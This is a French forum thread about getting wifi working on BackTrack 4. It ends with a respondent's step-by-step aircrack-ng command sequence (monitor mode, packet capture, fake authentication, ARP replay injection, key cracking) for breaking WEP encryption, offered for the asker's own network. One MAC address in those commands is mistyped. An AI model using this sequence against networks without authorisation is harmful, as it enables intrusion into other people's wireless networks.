Wifi back track 4
resistence
Messages postés
5
Statut
Membre
-
Ro&ri Messages postés 751 Statut Membre -
Ro&ri Messages postés 751 Statut Membre -
Bonjour a tous je suis deseperer car cela fait des heures que je cherche comment activé le wifi sous back track 4
j'ai essayer /ect/init.d/networking start dans un shell est a dit que il ni avait pas de commande
si il vous plait aider moi je sature
j'ai essayer /ect/init.d/networking start dans un shell est a dit que il ni avait pas de commande
si il vous plait aider moi je sature
A voir également:
- Wifi back track 4
- Code gta 4 ps4 - Guide
- Get data back - Télécharger - Récupération de données
- Changer wifi chromecast - Guide
- Voir mot de passe wifi android - Guide
- Adresse mac wifi - Guide
9 réponses
Simplement, dans une konsole ::
Puis pour lancer le petit utilitaire de configuration, wicd-client ou un truc du style (wicd- <touche tab> et tu le retrouves =))
Truc cool aussi une fois un réseau enregistré, il suffit de lancer wicd dans un terminal pour qu'il s'y connecte automatiquement, même sans avoir lancé X.
wicd
Puis pour lancer le petit utilitaire de configuration, wicd-client ou un truc du style (wicd- <touche tab> et tu le retrouves =))
Truc cool aussi une fois un réseau enregistré, il suffit de lancer wicd dans un terminal pour qu'il s'y connecte automatiquement, même sans avoir lancé X.
bon le truc bien c'est que sa marche mais lorsque je vais pour le connecter il me met "this network requires encryption to be enabled" ?
en gros d'après se que je comprend faut que j'active quelque chose pour pouvoir me connecter au réseau.
resistence
en gros d'après se que je comprend faut que j'active quelque chose pour pouvoir me connecter au réseau.
resistence
A côté du nom de réseau (juste à gauche) tu as une petite flèche noire, tu cliques dessus, un "menu" se déroule, et tu clique sur "advanced settings", en bas de la petite fenêtre qui vas s'ouvrir tu peut rentrer ta clef et choisir si c'est du WEP, WPA ... (enfin si c'est du ton séseau j'espère que tu n'es pas en WEP, étant sous backtrack tu as sans doutes déja expérimenté les faiblesses de ce cryptage ...)
Vous n’avez pas trouvé la réponse que vous recherchez ?
Posez votre question
ok je vais essayer et honte a moi ^^ je suis toujours en wep et je veut essayer de craké mon reseau histoire de faire la main
Pour ça les tuto de brico-wifi sont excellents, pour faire un petit résumé ::
Biensur il faut remplaces les 11:22:33:44:55:66 par l'adresse mac de ta box, et les AA:BB:CC:DD:EE:FF par l'adresse d'un client authentifié...
Je te conseilles quand même de lire le tuto de brico-wifi pour les débuts,ce que j'ai écrit ca reste plus proche du pense bête qu'autre chose...
airmon-ng start wlan0 #remplace wlan0 par le nom de ton interface wifi, tape armon-ng sans arguments pour l'avoir airodump-ng -w fichierdecapture --bssid 11:22:33:44:55:66 --channel X wlan0 #laisser tourner dans 1 terminal a part aireplay-ng -1 30 -b 11:22:33:44:55:66 -h AA:BB:CC:DD:EE:FF wlan0 aireplay-ng -3 -a 11:22:33:44:55:55 -h AA:BB:CC:DD:EE:FF wlan0 #laisser tourner dans 1 autre terminal #une fois les 5000 ivs atteints aircrack-ng -P2 fichierdecapture.cap #dans un 3em terminal...
Biensur il faut remplaces les 11:22:33:44:55:66 par l'adresse mac de ta box, et les AA:BB:CC:DD:EE:FF par l'adresse d'un client authentifié...
Je te conseilles quand même de lire le tuto de brico-wifi pour les débuts,ce que j'ai écrit ca reste plus proche du pense bête qu'autre chose...